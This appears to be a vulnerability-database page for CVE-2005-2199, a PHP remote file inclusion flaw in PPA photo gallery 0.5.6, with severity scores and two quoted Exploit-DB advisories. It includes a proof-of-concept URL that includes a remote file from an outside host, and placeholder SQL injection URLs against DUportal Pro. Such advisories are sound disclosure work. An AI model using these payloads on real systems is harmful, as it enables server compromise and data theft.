CVE-2005-2199
Published 2005-07-11
Priority P345, high, 7.5 (CVSS 2.0)
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 10.07% (95.0th percentile)
PHP remote file inclusion vulnerability in inc/functions.inc.php in PPA web photo gallery 0.5.6 allows remote attackers to execute arbitrary code via the config[ppa_root_path] variable.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| skrypty | ppa_gallery | — | — |
No detection rules found.
Exploit-DB
PPA 0.5.6 - 'ppa_root_path' File Inclusion
exploitdb·2005-07-10
---
source: https://www.securityfocus.com/bid/14209/info
PPA is susceptible to a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.
http://www.example.com/inc/functions.inc.php?config[ppa_root_path]=http://www.example.com
Exploit-DB
DUware DUportal 3.4.3 Pro - Multiple SQL Injections
exploitdb·2005-06-22
---
source: https://www.securityfocus.com/bid/14029/info
DUportal Pro is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries.
Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
Some of these issues may have previously been discussed in BID 13285 and BID 13288.
http://www.example.com/DUportalPro34/Articles/default.asp?iChannel=2[SQL Inject]&nChannel=Articles
http://www.example.com/DUportalPro34/Articles/detail.asp?iData=4[SQL Inject]&iCat=292&iChannel=2&nChannel=
No writeups or analysis indexed.